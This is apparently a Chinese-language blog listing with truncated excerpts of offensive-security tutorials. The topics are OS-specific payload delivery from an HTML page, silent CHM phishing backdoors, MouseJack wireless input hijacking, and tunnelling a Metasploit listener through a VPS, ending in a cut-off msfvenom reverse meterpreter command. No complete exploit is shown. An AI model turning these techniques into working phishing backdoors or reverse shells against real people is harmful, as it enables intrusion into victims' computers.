可以通过此针对不同操作系统来执行不同的paylaod index.html:<html><head></head><body><script>var url_base='http: ...
高级组合技打造“完美” 捆绑后门
0x00 简介
之前写过一篇关于客户端钓鱼的文章:《使用powershell Client进行有效钓鱼》中,在使用各个Client进行测试的过程中,个人发现CHM文件是最好用的一个,但是其缺点就是会弹黑框,这样就会让被攻击者察觉。那么怎么让他不弹黑框呢?那就是本文要介绍的内容啦~
Mousejack_replay
0x00 简介
Bastille的研究团队发现了一种针对蓝牙键盘鼠标的攻击,攻击者可以利用漏洞控制你的电脑操作。研究团队将此攻击命名为MouseJack。 Mousejack 之前在Freebuf上有所介绍:MouseJack:利用15美元的工具和15行代码控制无线鼠标和键盘,当然,制作团队也将部分测试代码公开在github上,该团队网站地址为:https://www.mousejack.com/ 从视频中,可以看到攻击者通过此技术,直接操纵受害者电脑,但由于目前该团队并没有公开完整代码,所以有了下面的测试代码。
怎么烧固件这里就不说了,在原github有详细说明,drops也有介绍:Mousejack测试指南,如果在windows平台,我也写过一个介绍:windows下刷MouseJack固件。
通过VPS SSH隧道使用本地msf
这里首先需要配置VPS ssh服务编辑 /etc/ssh/sshd_config在文件最后添加: GatewayPorts yes 重启ssh服务之后配置msf客户端:msfvenom -p windows/meterpreter/reve ...